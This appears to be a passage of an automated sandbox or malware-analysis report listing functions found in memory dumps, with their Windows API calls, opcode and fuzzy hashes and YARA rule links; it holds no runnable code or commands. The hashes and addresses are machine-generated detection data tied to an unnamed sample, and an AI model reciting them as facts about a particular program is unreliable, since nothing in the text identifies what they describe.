                                          Function 01156FC8, Relevance: 4.0, APIs: 1, Strings: 1, Instructions: 537libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5618168802.0000000001150000.00000040.00000010.sdmp, Offset: 01150000, based on PE: false
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID: l
                                          • API String ID: 2994545307-2517025534
                                          • Opcode ID: 195ab30c8520e32ab5e046f18f068c3f9eb1337cf858e86b73b506df8879826e
                                          • Instruction ID: 4427500b22d9634b602388c088506cbe0e3efb557891ff45901ca3982100b81f
                                          • Opcode Fuzzy Hash: 195ab30c8520e32ab5e046f18f068c3f9eb1337cf858e86b73b506df8879826e
                                          • Instruction Fuzzy Hash: 32128034A04205CFDB69DBACC4867AEBBF2EF85314F508869E925DB292DB34DC418B51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0116D018, Relevance: 2.8, Strings: 2, Instructions: 338COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5618526738.0000000001160000.00000040.00000010.sdmp, Offset: 01160000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: HQm$HQm
                                          • API String ID: 0-554595761
                                          • Opcode ID: 99b85b943a6dd7789c08e55b84419c2ecdc7e474f0eb16f509c5a92e8be52381
                                          • Instruction ID: a293f8109d347b0e8b84cfa7dabe88bef2e77c82a3dd111778c78fc622439b89
                                          • Opcode Fuzzy Hash: 99b85b943a6dd7789c08e55b84419c2ecdc7e474f0eb16f509c5a92e8be52381
                                          • Instruction Fuzzy Hash: 6DC168307082149FEF1ADBA8D854BBE7BAAAF85700F048469E585DB3D1CB36DC51C792
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00936971, Relevance: 2.1, APIs: 1, Instructions: 631libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5610790236.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 3ea4475a2b456bc0e23b0a3b4afa1b73e0ef22c6fb7aac36493d5303ad52749d
                                          • Instruction ID: d4c4ba10d8de7429ebaa7a1830c14d78bb582feafe92912f56b98138c5ff2636
                                          • Opcode Fuzzy Hash: 3ea4475a2b456bc0e23b0a3b4afa1b73e0ef22c6fb7aac36493d5303ad52749d
                                          • Instruction Fuzzy Hash: 3062FBB4909228CFDB64DF74C88869DB7B6BF48305F2085EAD60AA3355CB349E81DF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 009369B8, Relevance: 2.1, APIs: 1, Instructions: 624libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5610790236.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 68e8d171f4c6e9d7ba6ceafe8882e5d5daae63c20e83bb309442171d1323f91f
                                          • Instruction ID: 43ec5cb50df3e4690cee029311766d555d4031935ee6ab591341eb398d8b1c4e
                                          • Opcode Fuzzy Hash: 68e8d171f4c6e9d7ba6ceafe8882e5d5daae63c20e83bb309442171d1323f91f
                                          • Instruction Fuzzy Hash: 3F52FBB4909228CFDB64DF74C88869DB7B6BF48305F2085EAD60AA3355CB349E81DF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 009369FF, Relevance: 2.1, APIs: 1, Instructions: 617libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5610790236.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: a77de22bfdf4f3bc79df5869d456769176fa7d82025f4a2d6895e2e1ec8e55cb
                                          • Instruction ID: 15213fa47a14275fc2e0a62b0c4f03b3a556ddccb4e8137326d9b64086238e43
                                          • Opcode Fuzzy Hash: a77de22bfdf4f3bc79df5869d456769176fa7d82025f4a2d6895e2e1ec8e55cb
                                          • Instruction Fuzzy Hash: D552FBB4908228CFDB64DF74C88869DB7B6BF48305F2085EAD60AA3355CB349E81DF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00936A46, Relevance: 2.1, APIs: 1, Instructions: 610libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5610790236.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 7f27d4026c68afd34c30c08480a7d1d318e626cef76d83f07fd797a49da7d4aa
                                          • Instruction ID: 7877d5557a671d7496b3efe7c34f189092d861ef867e5fee8a541c8ce318b4b0
                                          • Opcode Fuzzy Hash: 7f27d4026c68afd34c30c08480a7d1d318e626cef76d83f07fd797a49da7d4aa
                                          • Instruction Fuzzy Hash: 6152FBB4908228CFDB64DF74C88869DB7B6BF48305F2085EAD60AA3355CB349E81DF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00936A8D, Relevance: 2.1, APIs: 1, Instructions: 603libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5610790236.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 1407f54ff3dabee0a797f767155d202ca6b7754a6caf43f01bed0abc42bb6fa9
                                          • Instruction ID: ad5595377a9c32a75f51f4742cd30095089fbf65cec5b3657fc006c48873f19a
                                          • Opcode Fuzzy Hash: 1407f54ff3dabee0a797f767155d202ca6b7754a6caf43f01bed0abc42bb6fa9
                                          • Instruction Fuzzy Hash: 9152FCB4908228CFDB64DF74C88869DB7B6BF48305F2085EAD60AA3355DB349E81DF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00936AD4, Relevance: 2.1, APIs: 1, Instructions: 596libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5610790236.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: 1b53f866097c68f3f5581cb2646ad2d71c464adce14575a114fb3c7b54277cdb
                                          • Instruction ID: cdc697118e1a2f2cbf343220bf3a74e7a47603c9459819fee1ae98055ef4f031
                                          • Opcode Fuzzy Hash: 1b53f866097c68f3f5581cb2646ad2d71c464adce14575a114fb3c7b54277cdb
                                          • Instruction Fuzzy Hash: 2C52FCB4909228CFDB64DF74C88869DB7B6BF48305F2085EAD50AA3355CB349E81DF51
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00936B1B, Relevance: 2.1, APIs: 1, Instructions: 587libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5610790236.0000000000930000.00000040.00000001.sdmp, Offset: 00930000, based on PE: false
                                          Similarity
                                          • API ID: InitializeThunk
                                          • String ID:
                                          • API String ID: 2994545307-0
                                          • Opcode ID: b4a3b97b90267e408fbdbc6532ab75ec209d24e75c1f34ae8ac23f4cbecb89ff
                                          • Instruction ID: e45879c91d5c8932c0b4d98a5a338f67033aa2b9aaea2ca153dc9dc8f5a8441e
                                          • Opcode Fuzzy Hash: b4a3b97b90267e408fbdbc6532ab75ec209d24e75c1f34ae8ac23f4cbecb89ff
                                          • Instruction Fuzzy Hash: F352FCB4908228CFDB64DF74C88869DB7B6BF48305F2085EAD60AA3355CB349E81DF55
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1DAF53F0, Relevance: 1.8, APIs: 1, Instructions: 290COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 1DAF57B6
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5632279239.000000001DAF0000.00000040.00000001.sdmp, Offset: 1DAF0000, based on PE: false
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: 0e2b98a2aee770e323b5be7cd767eba652f77dc26105d7b0f310fff67f1fd7ef
                                          • Instruction ID: 9c264f1a6060ddf510cd07df05b9e35b3ab9853af8d224c18e196f1db0755426
                                          • Opcode Fuzzy Hash: 0e2b98a2aee770e323b5be7cd767eba652f77dc26105d7b0f310fff67f1fd7ef
                                          • Instruction Fuzzy Hash: 22B1BD74B007019FCB04DFB9C49056EB7F6BF88614B018A6DD89ACB761DB74F8468B91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1DAF4A08, Relevance: 1.7, APIs: 1, Instructions: 154COMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1DAF690A
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5632279239.000000001DAF0000.00000040.00000001.sdmp, Offset: 1DAF0000, based on PE: false
                                          Similarity
                                          • API ID: CreateWindow
                                          • String ID:
                                          • API String ID: 716092398-0
                                          • Opcode ID: 139352650080cdbe1732789480fe491ace63b49e3a5728fc12da8aa251dd84e2
                                          • Instruction ID: d6d901f7c97b8c128fc557fb23d019ca512176d3188ae4d6122a96f1764f9073
                                          • Opcode Fuzzy Hash: 139352650080cdbe1732789480fe491ace63b49e3a5728fc12da8aa251dd84e2
                                          • Instruction Fuzzy Hash: 24513771C043489FCB01DFA9C890ADEBFB5BF9A314F28859AE414AB261D7349844CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1DAF67F3, Relevance: 1.6, APIs: 1, Instructions: 118COMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1DAF690A
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5632279239.000000001DAF0000.00000040.00000001.sdmp, Offset: 1DAF0000, based on PE: false
                                          Similarity
                                          • API ID: CreateWindow
                                          • String ID:
                                          • API String ID: 716092398-0
                                          • Opcode ID: 03133676fc1e234f9a795d5b2ac329b7e77025a42b36648a373dbb9fcd05bfb1
                                          • Instruction ID: 909acd063366379002ecd157ad9f9940a1f0d8d3763db11f89766b349dfef327
                                          • Opcode Fuzzy Hash: 03133676fc1e234f9a795d5b2ac329b7e77025a42b36648a373dbb9fcd05bfb1
                                          • Instruction Fuzzy Hash: 6E51BFB1D00309DFDB14CFA9C884ADEBBB5FF88314F24856AE819AB210D771A945CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1DAF4A7C, Relevance: 1.6, APIs: 1, Instructions: 116COMMON
                                          Download Yara Rule
                                          APIs
                                          • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 1DAF690A
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5632279239.000000001DAF0000.00000040.00000001.sdmp, Offset: 1DAF0000, based on PE: false
                                          Similarity
                                          • API ID: CreateWindow
                                          • String ID:
                                          • API String ID: 716092398-0
                                          • Opcode ID: 605bad336d5346838c1c1bedb1e327da067facfca216276d1daead4c9ff3a453
                                          • Instruction ID: 4f65031928ea7b528199d2e15df5394b63cc60476e633f932f3bce2e171f66f0
                                          • Opcode Fuzzy Hash: 605bad336d5346838c1c1bedb1e327da067facfca216276d1daead4c9ff3a453
                                          • Instruction Fuzzy Hash: 8B51AEB1D00309DFDB14CFA9C884ADEBBB5FF88314F24856AE819AB250D771A945CF91
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0115B921, Relevance: 1.6, APIs: 1, Instructions: 113registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 0115BA34
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5618168802.0000000001150000.00000040.00000010.sdmp, Offset: 01150000, based on PE: false
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: ccfcb8a9a11287fcc45b6daa31884e484bec2d6f9eb3a64da71dbcebddb3d610
                                          • Instruction ID: a2230b42bae115fb532c68a5270508bee8e1b29927c9a827638aa434d6c4bb94
                                          • Opcode Fuzzy Hash: ccfcb8a9a11287fcc45b6daa31884e484bec2d6f9eb3a64da71dbcebddb3d610
                                          • Instruction Fuzzy Hash: ED4153B0E04249CFDB04CFA9C584A9EFFF5AF88304F24C56AE808AB251D7759845CB95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1DAFA144, Relevance: 1.6, APIs: 1, Instructions: 97COMMON
                                          Download Yara Rule
                                          APIs
                                          • CallWindowProcW.USER32(?,?,?,?,?), ref: 1DAFB4E1
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5632279239.000000001DAF0000.00000040.00000001.sdmp, Offset: 1DAF0000, based on PE: false
                                          Similarity
                                          • API ID: CallProcWindow
                                          • String ID:
                                          • API String ID: 2714655100-0
                                          • Opcode ID: adedd17de3741bc5a75fefadbe6e7c3f3ddb1676548ae67b7979b351ff0f9845
                                          • Instruction ID: 9aff2a44fe2630c491d99fecbbf513fd6ce94cd8710ecf1380d9c0d6dd317522
                                          • Opcode Fuzzy Hash: adedd17de3741bc5a75fefadbe6e7c3f3ddb1676548ae67b7979b351ff0f9845
                                          • Instruction Fuzzy Hash: C74106B99003098FCB10CF95C584AAEBBF5FF89314F24C899E519AB321D775A841CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0115BBDC, Relevance: 1.6, APIs: 1, Instructions: 89registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0115BCA1
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5618168802.0000000001150000.00000040.00000010.sdmp, Offset: 01150000, based on PE: false
                                          Similarity
                                          • API ID: QueryValue
                                          • String ID:
                                          • API String ID: 3660427363-0
                                          • Opcode ID: 89506e99a9ffc576211c23df1f5a773aa8c5d7ae3ac2cc395176b325de453c16
                                          • Instruction ID: 97ee2eb78a3a676dbcd11902a28902237f51cf9f66f2dcf9823d6805da34d2c4
                                          • Opcode Fuzzy Hash: 89506e99a9ffc576211c23df1f5a773aa8c5d7ae3ac2cc395176b325de453c16
                                          • Instruction Fuzzy Hash: AA4102B1D04258DFCB24CF99C884ACEBBF6BF48314F15842AE928AB310DB709900CF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01158A20, Relevance: 1.6, APIs: 1, Instructions: 88registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegQueryValueExW.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 0115BCA1
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5618168802.0000000001150000.00000040.00000010.sdmp, Offset: 01150000, based on PE: false
                                          Similarity
                                          • API ID: QueryValue
                                          • String ID:
                                          • API String ID: 3660427363-0
                                          • Opcode ID: 82fb503665608b363881dbb97a78f45c1b275a8541c4d48a0f240a0f96d8e394
                                          • Instruction ID: 9d96bf72c4eaebe68f6687340524fbc2cd2f20269558700aae5bfb838110340e
                                          • Opcode Fuzzy Hash: 82fb503665608b363881dbb97a78f45c1b275a8541c4d48a0f240a0f96d8e394
                                          • Instruction Fuzzy Hash: DB31E3B1D04258DFCB24CF99C984A9EFBF6BF48310F15841AE928AB310CB709904CF94
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01158A14, Relevance: 1.6, APIs: 1, Instructions: 83registryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • RegOpenKeyExW.KERNEL32(80000001,00000000,?,00000001,?), ref: 0115BA34
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5618168802.0000000001150000.00000040.00000010.sdmp, Offset: 01150000, based on PE: false
                                          Similarity
                                          • API ID: Open
                                          • String ID:
                                          • API String ID: 71445658-0
                                          • Opcode ID: d2330917add7572bf2e3201867a51040f25c76b97839dd95495b85451e98d517
                                          • Instruction ID: 789a92392f6fc2079d937c5ef2bfa19233b5e8750bc66bb7025cdb083f5a1fae
                                          • Opcode Fuzzy Hash: d2330917add7572bf2e3201867a51040f25c76b97839dd95495b85451e98d517
                                          • Instruction Fuzzy Hash: D0310EB0D04249DFDB14CF99C584A9EFFF5BF48314F28856AE818AB201C775A885CF95
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C2C1EC, Relevance: 1.6, APIs: 1, Instructions: 80threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5612489922.0000000000C2C000.00000040.00000001.sdmp, Offset: 00C2C000, based on PE: false
                                          Similarity
                                          • API ID: TerminateThread
                                          • String ID:
                                          • API String ID: 1852365436-0
                                          • Opcode ID: b17aa47dd484b2912ad4156aa15d8b83de4536f4580905a788ba25d028cb1915
                                          • Instruction ID: 510146ac4f32030113d2f67a8e132ab4a038919a447db19e62cab0a6619120ed
                                          • Opcode Fuzzy Hash: b17aa47dd484b2912ad4156aa15d8b83de4536f4580905a788ba25d028cb1915
                                          • Instruction Fuzzy Hash: B721F7712083528FD768CF34DCC57AA77A2BF42310F59C69AC4D9CA5B5D7358985C702
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00C2C255, Relevance: 1.6, APIs: 1, Instructions: 68threadCOMMON
                                          Download Yara Rule
                                          APIs
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5612489922.0000000000C2C000.00000040.00000001.sdmp, Offset: 00C2C000, based on PE: false
                                          Similarity
                                          • API ID: TerminateThread
                                          • String ID:
                                          • API String ID: 1852365436-0
                                          • Opcode ID: 1a1f04f2c62b9b567af2ca1ffd795881842b163dfc9bc42eabe8902a98edc2c9
                                          • Instruction ID: ccb03d31947ea1b664f58e302154150f9e397b98d58a86127297c7628eea5e41
                                          • Opcode Fuzzy Hash: 1a1f04f2c62b9b567af2ca1ffd795881842b163dfc9bc42eabe8902a98edc2c9
                                          • Instruction Fuzzy Hash: 472125715083A19AC324CF70A8D9AAE7B91BF26210F15978DD0D94B5B1CB754982CB52
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1DAFA54B, Relevance: 1.6, APIs: 1, Instructions: 66COMMON
                                          Download Yara Rule
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1DAFA5D7
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5632279239.000000001DAF0000.00000040.00000001.sdmp, Offset: 1DAF0000, based on PE: false
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: e886e28a544ad2732306f5f5dd5b85c477bd8138c7a8e578d4bd1cad5cf3d155
                                          • Instruction ID: 61d807d5abae411371cf3cb0b30d20d12bd56dbec55f3ae30d0fc2a180709c57
                                          • Opcode Fuzzy Hash: e886e28a544ad2732306f5f5dd5b85c477bd8138c7a8e578d4bd1cad5cf3d155
                                          • Instruction Fuzzy Hash: 3D21D2B5900219AFDB10CFA9D881ADEFBF8FF48320F14841AE915A7310D774A954CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1DAFA550, Relevance: 1.6, APIs: 1, Instructions: 62COMMON
                                          Download Yara Rule
                                          APIs
                                          • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 1DAFA5D7
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5632279239.000000001DAF0000.00000040.00000001.sdmp, Offset: 1DAF0000, based on PE: false
                                          Similarity
                                          • API ID: DuplicateHandle
                                          • String ID:
                                          • API String ID: 3793708945-0
                                          • Opcode ID: 9efb45fedf5f869bafd72ef5eabdfb3dafeac0e971e11b5eb78388117f5b42b7
                                          • Instruction ID: de471e6b7e763b019a8b009c4c8b48e1b12b4e02098399da3728c7b9a315f55a
                                          • Opcode Fuzzy Hash: 9efb45fedf5f869bafd72ef5eabdfb3dafeac0e971e11b5eb78388117f5b42b7
                                          • Instruction Fuzzy Hash: 3421E0B59002089FDB10CFAAD880ADEFBF8EF48320F14841AE914A7210C374A950CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 009422E0, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00000000,?,00942B91,00000800), ref: 00942C22
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5611229307.0000000000940000.00000040.00000001.sdmp, Offset: 00940000, based on PE: false
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 1a3a4b1676d719e8a50ddfabb17b59f6b5759fb71d629777578bf6c784531e7f
                                          • Instruction ID: 62481fcac089d552e980dc65205f434035bb4134f7d755a357d1b4bf6873d01d
                                          • Opcode Fuzzy Hash: 1a3a4b1676d719e8a50ddfabb17b59f6b5759fb71d629777578bf6c784531e7f
                                          • Instruction Fuzzy Hash: F91106B6D002088FCB20CF9AD444ADEFBF8FB98314F14886AE955A7200C774A944CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 00942BB0, Relevance: 1.6, APIs: 1, Instructions: 55libraryCOMMON
                                          Download Yara Rule
                                          APIs
                                          • LoadLibraryExW.KERNEL32(00000000,00000000,?,?,?,?,?,?,?,00000000,?,00942B91,00000800), ref: 00942C22
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5611229307.0000000000940000.00000040.00000001.sdmp, Offset: 00940000, based on PE: false
                                          Similarity
                                          • API ID: LibraryLoad
                                          • String ID:
                                          • API String ID: 1029625771-0
                                          • Opcode ID: 3b7bff3430870eb9e9420a11223f026c921adcfcdcdf8d0a7dff4e3a046f17e2
                                          • Instruction ID: bfd3c881719a91044b409881ecdd8be93819c6fb84ee91b46e44cb32619570bf
                                          • Opcode Fuzzy Hash: 3b7bff3430870eb9e9420a11223f026c921adcfcdcdf8d0a7dff4e3a046f17e2
                                          • Instruction Fuzzy Hash: 6F11F4B68003089FDB10CFAAC844ADEFBF8EF89314F14886AE554A7210C775A545CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1DAF5749, Relevance: 1.6, APIs: 1, Instructions: 52COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 1DAF57B6
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5632279239.000000001DAF0000.00000040.00000001.sdmp, Offset: 1DAF0000, based on PE: false
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: 646fcf7081de1835efafe9d9b3573bbf124a0e59ab6c10b65efedf7a4bb970f2
                                          • Instruction ID: 1ee8f7d8693194044cb278b84c7ede53e17c5bb1ff7a84c086d7b823f893f1ac
                                          • Opcode Fuzzy Hash: 646fcf7081de1835efafe9d9b3573bbf124a0e59ab6c10b65efedf7a4bb970f2
                                          • Instruction Fuzzy Hash: 9C11F0B5C00609DFDB10CFAAD844BDEFBF8AF89324F11885AD869A7600D374A545CFA1
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 1DAF37C8, Relevance: 1.6, APIs: 1, Instructions: 50COMMON
                                          Download Yara Rule
                                          APIs
                                          • GetModuleHandleW.KERNEL32(00000000), ref: 1DAF57B6
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5632279239.000000001DAF0000.00000040.00000001.sdmp, Offset: 1DAF0000, based on PE: false
                                          Similarity
                                          • API ID: HandleModule
                                          • String ID:
                                          • API String ID: 4139908857-0
                                          • Opcode ID: 7ed64147103fd17816d7cda92b2c67e7049cbbcf292177b8dc8ec095c3237094
                                          • Instruction ID: 19cd7c48c8a47e4b0772f8d59216eab8b9c9e9934e8772de9d3d5b839cf0494d
                                          • Opcode Fuzzy Hash: 7ed64147103fd17816d7cda92b2c67e7049cbbcf292177b8dc8ec095c3237094
                                          • Instruction Fuzzy Hash: FC11F0B5C047498FCB10CF9AC444B9EFBF8AF89224F11885AE999B7210C374A545CFA6
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 009468A8, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OleInitialize.OLE32(00000000), ref: 00946905
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5611229307.0000000000940000.00000040.00000001.sdmp, Offset: 00940000, based on PE: false
                                          Similarity
                                          • API ID: Initialize
                                          • String ID:
                                          • API String ID: 2538663250-0
                                          • Opcode ID: 6300ea17085acf480ed74fb069c94dc8a82a5aadf5f1791d38c2d3ab295ee984
                                          • Instruction ID: 0c6ef71b01c3dd0f87e9de22a7bc719783ba2c4d41227f3f6ee50350a8176c07
                                          • Opcode Fuzzy Hash: 6300ea17085acf480ed74fb069c94dc8a82a5aadf5f1791d38c2d3ab295ee984
                                          • Instruction Fuzzy Hash: 1A1115B5800248CFDB20CFA9D845BDEFBF8EF49324F24885AD559A7610C374A944CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 009459F8, Relevance: 1.5, APIs: 1, Instructions: 46comCOMMON
                                          Download Yara Rule
                                          APIs
                                          • OleInitialize.OLE32(00000000), ref: 00946905
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5611229307.0000000000940000.00000040.00000001.sdmp, Offset: 00940000, based on PE: false
                                          Similarity
                                          • API ID: Initialize
                                          • String ID:
                                          • API String ID: 2538663250-0
                                          • Opcode ID: fb9c2eaf5ab50c404f6095518f06f02f627b5ad5d7d89d9b2565dece29a202a3
                                          • Instruction ID: 8062709c5d54e394f45194391b61da208983ea9a9fe3ba8d6448518aaf493842
                                          • Opcode Fuzzy Hash: fb9c2eaf5ab50c404f6095518f06f02f627b5ad5d7d89d9b2565dece29a202a3
                                          • Instruction Fuzzy Hash: 191103B19043488FCB20CF99D445BDEFBF8EB49324F24885AD558A7310C774A944CFA5
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 0116D7B8, Relevance: 1.5, Strings: 1, Instructions: 250COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5618526738.0000000001160000.00000040.00000010.sdmp, Offset: 01160000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: (oMm
                                          • API String ID: 0-1906178173
                                          • Opcode ID: b51fd84be73eec2295bf1f11834c22fb7710800df90a909097c5ba383c42feed
                                          • Instruction ID: 281989f8d713a893bf3b2589a624b19f10f90ecde3ce93e501c87e3cbf05ccbe
                                          • Opcode Fuzzy Hash: b51fd84be73eec2295bf1f11834c22fb7710800df90a909097c5ba383c42feed
                                          • Instruction Fuzzy Hash: 18A1D131B04249DFDF09CFE8D844ADEBFBABF89310F048559E945AB2A1D771A854CB50
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 01165BBC, Relevance: 1.5, Strings: 1, Instructions: 210COMMON
                                          Download Yara Rule
                                          Strings
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5618526738.0000000001160000.00000040.00000010.sdmp, Offset: 01160000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID: PHMm
                                          • API String ID: 0-3792969835
                                          • Opcode ID: 7dd4099c1412eab39aabe52550b45617d443a059936203f265095fcad862f39c
                                          • Instruction ID: c2c7cbd4103c6c749b9496f4ae4a11e2de0902ea41f64ef245461428b420e077
                                          • Opcode Fuzzy Hash: 7dd4099c1412eab39aabe52550b45617d443a059936203f265095fcad862f39c
                                          • Instruction Fuzzy Hash: B9817030B042149FEB08DBB4C999B6DBBB7EF84365F158A24E5169B2E0DB359C42CF41
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011666E8, Relevance: .2, Instructions: 210COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5618526738.0000000001160000.00000040.00000010.sdmp, Offset: 01160000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 67f1e12f05df9b52c03eeb8cd588ffde6286d954f25c5fe7ad9b37426095035f
                                          • Instruction ID: f8c63e2338c956935dccd3a1166bea35e95b409328cc9c2cc2e448b314121cd0
                                          • Opcode Fuzzy Hash: 67f1e12f05df9b52c03eeb8cd588ffde6286d954f25c5fe7ad9b37426095035f
                                          • Instruction Fuzzy Hash: 29711570A003448FEB18CB3CC84479DBBAAAF85304F24C6A9D9099F399D772DC55C762
                                          Uniqueness

                                          Uniqueness Score: -1.00%

                                          Function 011665E8, Relevance: .2, Instructions: 177COMMON
                                          Download Yara Rule
                                          Memory Dump Source
                                          • Source File: 0000001A.00000002.5618526738.0000000001160000.00000040.00000010.sdmp, Offset: 01160000, based on PE: false
                                          Similarity
                                          • API ID:
                                          • String ID:
                                          • API String ID:
                                          • Opcode ID: 5d412eca7edee15a09968951f4fa110622fdf895569914304d5f4814eb68efe9
                                          • Instruction ID: bc534638442608e6d97e4b5b099bf0702948579d87a6c1796757acb52590fb82
